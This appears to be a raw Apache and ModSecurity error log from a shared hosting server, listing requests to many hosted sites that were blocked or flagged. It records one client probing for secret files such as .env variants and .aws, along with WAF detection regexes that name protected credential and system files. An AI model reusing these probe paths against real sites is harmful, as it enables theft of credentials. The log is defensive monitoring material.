[Tue May 26 17:58:11.353443 2026] [core:error] [pid 946381:tid 946563] [client 45.148.10.204:55574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.482818 2026] [core:error] [pid 946381:tid 946515] [client 45.148.10.204:55586] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.482835 2026] [core:error] [pid 946381:tid 946515] [client 45.148.10.204:55586] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:11.737434 2026] [security2:error] [pid 946381:tid 946385] [remote 160.250.186.220:52208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWR29iTu5WG4Dm5WpoEDQAAVQM"]
[Tue May 26 17:58:13.049503 2026] [security2:error] [pid 946381:tid 946610] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR3NiTu5WG4Dm5WpoEOAAAAGM"]
[Tue May 26 17:58:13.227811 2026] [security2:error] [pid 946381:tid 946398] [remote 160.250.186.220:52208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWR3diTu5WG4Dm5WpoERwAAGBA"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 17:58:14.630660 2026] [security2:error] [pid 946381:tid 946583] [client 198.199.65.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahWR3tiTu5WG4Dm5WpoEcgAAAEg"], referer: https://kardashevtechnologies.com/
[Tue May 26 17:58:15.696593 2026] [security2:error] [pid 946381:tid 946600] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR39iTu5WG4Dm5WpoEgAAAAFk"]
[Tue May 26 17:58:16.419302 2026] [security2:error] [pid 946381:tid 946414] [remote 180.93.137.9:55556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.137.93.180.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWR4NiTu5WG4Dm5WpoElgAAVCA"]
[Tue May 26 17:58:18.162987 2026] [security2:error] [pid 946381:tid 946566] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR4diTu5WG4Dm5WpoEuwAAADc"]
[Tue May 26 17:58:20.904810 2026] [security2:error] [pid 946381:tid 946628] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR5NiTu5WG4Dm5WpoE8gAAAHU"]
[Tue May 26 17:58:21.640705 2026] [security2:error] [pid 946381:tid 946509] [remote 78.142.18.172:52312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWR5diTu5WG4Dm5WpoFCwAATX8"]
[Tue May 26 17:58:21.684287 2026] [security2:error] [pid 946381:tid 946505] [remote 47.128.127.35:37906] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "staging.unsobered.com"] [uri "/feature-post/new-technology-detects-whiskys-age/"] [unique_id "ahWR5diTu5WG4Dm5WpoFFQAAaXs"]
[Tue May 26 17:58:21.949883 2026] [security2:error] [pid 946381:tid 946440] [remote 78.142.18.172:52312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWR5diTu5WG4Dm5WpoFGAAAETo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 17:58:22.565590 2026] [security2:error] [pid 946381:tid 946530] [client 66.249.93.71:57351] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWR5tiTu5WG4Dm5WpoFLwAAABM"]
[Tue May 26 17:58:23.293165 2026] [security2:error] [pid 946381:tid 946566] [client 47.128.126.141:40738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "canopykaapi.com"] [uri "/robots.txt"] [unique_id "ahWR59iTu5WG4Dm5WpoFaQAAADc"]
[Tue May 26 17:58:23.408785 2026] [security2:error] [pid 946381:tid 946595] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR5tiTu5WG4Dm5WpoFPgAAAFQ"]
[Tue May 26 17:58:23.760411 2026] [core:crit] [pid 946381:tid 946543] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:58:24.370516 2026] [core:crit] [pid 946381:tid 946623] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:58:24.387304 2026] [security2:error] [pid 946381:tid 946616] [client 114.119.134.224:45445] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.dgssi.in"] [uri "/dgssi-contact.htm"] [unique_id "ahWR6NiTu5WG4Dm5WpoFnwAAAGk"], referer: http://www.dgssi.in/
[Tue May 26 17:58:24.565735 2026] [security2:error] [pid 946381:tid 946592] [client 45.131.195.67:35027] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "moneyapp.com.co"] [uri "/wp-includes/css/buttons.css"] [unique_id "ahWR6NiTu5WG4Dm5WpoFowAAAFE"]
[Tue May 26 17:58:24.931087 2026] [core:crit] [pid 946381:tid 946632] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:58:25.054807 2026] [security2:error] [pid 946381:tid 946562] [client 103.123.226.10:60144] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWR6NiTu5WG4Dm5WpoFtQAAADM"]
[Tue May 26 17:58:25.396683 2026] [core:crit] [pid 946381:tid 946604] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:58:25.424434 2026] [fcgid:warn] [pid 946381:tid 946591] (70014)End of file found: [client 103.123.226.10:9630] mod_fcgid: can't get data from http client
[Tue May 26 17:58:25.466971 2026] [security2:error] [pid 946381:tid 946629] [client 103.123.226.10:35424] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWR6diTu5WG4Dm5WpoFzgAAAHY"]
[Tue May 26 17:58:25.512598 2026] [fcgid:warn] [pid 946381:tid 946537] (70014)End of file found: [client 103.123.226.10:37402] mod_fcgid: can't get data from http client
[Tue May 26 17:58:25.549565 2026] [security2:error] [pid 946381:tid 946412] [remote 162.214.184.71:53096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWR6diTu5WG4Dm5WpoF0QAAMh4"]
[Tue May 26 17:58:25.867837 2026] [fcgid:warn] [pid 946381:tid 946528] (70014)End of file found: [client 103.123.226.10:14878] mod_fcgid: can't get data from http client
[Tue May 26 17:58:26.057618 2026] [security2:error] [pid 946381:tid 946409] [remote 160.250.186.220:59646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWR6diTu5WG4Dm5WpoF7gAAcBs"]
[Tue May 26 17:58:26.072508 2026] [security2:error] [pid 946381:tid 946548] [client 103.123.226.10:23976] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWR6NiTu5WG4Dm5WpoFwAAAACU"]
[Tue May 26 17:58:26.159724 2026] [security2:error] [pid 946381:tid 946637] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR6diTu5WG4Dm5WpoF4wAAAH4"]
[Tue May 26 17:58:26.599351 2026] [security2:error] [pid 946381:tid 946427] [remote 160.250.186.220:59646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWR6tiTu5WG4Dm5WpoGAwAABC0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 17:58:28.003711 2026] [security2:error] [pid 946381:tid 946436] [remote 216.73.216.30:33929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWR7NiTu5WG4Dm5WpoGJQAACDY"]
[Tue May 26 17:58:28.823802 2026] [security2:error] [pid 946381:tid 946517] [client 64.95.13.248:65461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 248.13.95.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "panda-eco.com"] [uri "/wp-content/plugins/wpclean/wpclean.php"] [unique_id "ahWR7NiTu5WG4Dm5WpoGNQAAAAY"]
[Tue May 26 17:58:28.865855 2026] [security2:error] [pid 946381:tid 946600] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR7NiTu5WG4Dm5WpoGLgAAAFk"]
[Tue May 26 17:58:30.916032 2026] [security2:error] [pid 946381:tid 946611] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR7tiTu5WG4Dm5WpoGXgAAAGQ"]
[Tue May 26 17:58:32.454612 2026] [security2:error] [pid 946381:tid 946532] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWR8NiTu5WG4Dm5WpoGkAAAABU"], referer: https://www.anujtradingco.com/
[Tue May 26 17:58:33.580374 2026] [security2:error] [pid 946381:tid 946607] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWR8diTu5WG4Dm5WpoGsAAAAGA"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1451839&moderation-hash=0506bc3814944501c4193447e555e945
[Tue May 26 17:58:34.414682 2026] [security2:error] [pid 946381:tid 946546] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR8tiTu5WG4Dm5WpoGvQAAACM"]
[Tue May 26 17:58:35.603726 2026] [security2:error] [pid 946381:tid 946472] [remote 18.209.220.99:50136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWR89iTu5WG4Dm5WpoG3gAARFo"]
[Tue May 26 17:58:36.297466 2026] [security2:error] [pid 946381:tid 946571] [client 114.119.140.64:56553] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.traderscafe.in"] [uri "/wp-content/uploads/2022/07/Premium-VPS-2.png"] [unique_id "ahWR9NiTu5WG4Dm5WpoG7wAAADw"], referer: https://www.traderscafe.in/servers/bellvps/premium-vps/
[Tue May 26 17:58:36.443161 2026] [security2:error] [pid 946381:tid 946586] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWR9NiTu5WG4Dm5WpoG-AAAAEs"], referer: https://anujtradingco.com
[Tue May 26 17:58:36.506089 2026] [authz_core:error] [pid 946381:tid 946599] [client 208.84.100.82:54440] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.local
[Tue May 26 17:58:36.506177 2026] [authz_core:error] [pid 946381:tid 946541] [client 208.84.100.82:54426] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env
[Tue May 26 17:58:36.597739 2026] [security2:error] [pid 946381:tid 946577] [client 74.7.241.160:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWR9NiTu5WG4Dm5WpoG_wAAAEI"]
[Tue May 26 17:58:36.597773 2026] [security2:error] [pid 946381:tid 946577] [client 74.7.241.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWR9NiTu5WG4Dm5WpoG_wAAAEI"]
[Tue May 26 17:58:36.599161 2026] [security2:error] [pid 946381:tid 946548] [client 74.7.241.160:49936] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWR9NiTu5WG4Dm5WpoG_QAAJQY"]
[Tue May 26 17:58:36.810705 2026] [authz_core:error] [pid 946381:tid 946630] [client 208.84.100.82:54418] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.production
[Tue May 26 17:58:36.836724 2026] [security2:error] [pid 946381:tid 946546] [client 74.7.241.160:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWR9NiTu5WG4Dm5WpoHCAAAACM"], referer: https://www.anujtradingco.com/robots.txt
[Tue May 26 17:58:36.837548 2026] [security2:error] [pid 946381:tid 946635] [client 74.7.241.160:49944] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWR9NiTu5WG4Dm5WpoHBgAAfF4"], referer: https://www.anujtradingco.com/robots.txt
[Tue May 26 17:58:36.918054 2026] [security2:error] [pid 946381:tid 946486] [remote 18.209.220.99:50136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWR9NiTu5WG4Dm5WpoHCgAAamg"], referer: https://filosha.com/wp-login.php
[Tue May 26 17:58:37.321910 2026] [security2:error] [pid 946381:tid 946525] [client 208.84.100.82:54440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "marchedesedhiou.com.azurmediatec.com"] [uri "/api/.env"] [unique_id "ahWR9diTu5WG4Dm5WpoHIQAAAA4"]
[Tue May 26 17:58:37.322476 2026] [security2:error] [pid 946381:tid 946569] [client 208.84.100.82:54426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "marchedesedhiou.com.azurmediatec.com"] [uri "/app/.env"] [unique_id "ahWR9diTu5WG4Dm5WpoHHQAAADo"]
[Tue May 26 17:58:37.322922 2026] [security2:error] [pid 946381:tid 946558] [client 208.84.100.82:54464] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "marchedesedhiou.com.azurmediatec.com"] [uri "/backend/.env"] [unique_id "ahWR9diTu5WG4Dm5WpoHJgAAAC8"]
[Tue May 26 17:58:37.323730 2026] [authz_core:error] [pid 946381:tid 946525] [client 208.84.100.82:54468] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.aws
[Tue May 26 17:58:38.506534 2026] [security2:error] [pid 946381:tid 946596] [client 123.16.73.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR9tiTu5WG4Dm5WpoHQQAAAFU"]
[Tue May 26 17:58:39.075156 2026] [security2:error] [pid 946381:tid 946529] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR9tiTu5WG4Dm5WpoHTgAAABI"]
[Tue May 26 17:58:41.217960 2026] [authz_core:error] [pid 946381:tid 946578] [client 208.84.100.82:54418] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.production.copy
[Tue May 26 17:58:42.460383 2026] [core:error] [pid 946381:tid 946631] [client 104.168.98.195:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:42.460404 2026] [core:error] [pid 946381:tid 946631] [client 104.168.98.195:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:58:42.678831 2026] [security2:error] [pid 946381:tid 946611] [client 85.208.96.209:64398] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-17th/list/"] [unique_id "ahWR-tiTu5WG4Dm5WpoHpQAAAGQ"]
[Tue May 26 17:58:42.679025 2026] [security2:error] [pid 946381:tid 946611] [client 85.208.96.209:64398] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-17th/list/"] [unique_id "ahWR-tiTu5WG4Dm5WpoHpQAAAGQ"]
[Tue May 26 17:58:43.007575 2026] [security2:error] [pid 946381:tid 946479] [remote 216.73.216.30:48453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWR-9iTu5WG4Dm5WpoHtAAACmE"]
[Tue May 26 17:58:43.213748 2026] [security2:error] [pid 946381:tid 946638] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWR-tiTu5WG4Dm5WpoHrQAAAH8"]
[Tue May 26 17:58:43.428691 2026] [authz_core:error] [pid 946381:tid 946542] [client 208.84.100.82:54418] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.swp
[Tue May 26 17:58:43.509690 2026] [authz_core:error] [pid 946381:tid 946622] [client 208.84.100.82:54448] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.orig
[Tue May 26 17:58:43.511998 2026] [authz_core:error] [pid 946381:tid 946601] [client 208.84.100.82:54456] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.copy
[Tue May 26 17:58:43.518286 2026] [authz_core:error] [pid 946381:tid 946541] [client 208.84.100.82:54462] AH01630: client denied by server configuration: /home2/azurm42s/public_html/marchedesedhiou.com/.env.local.bak
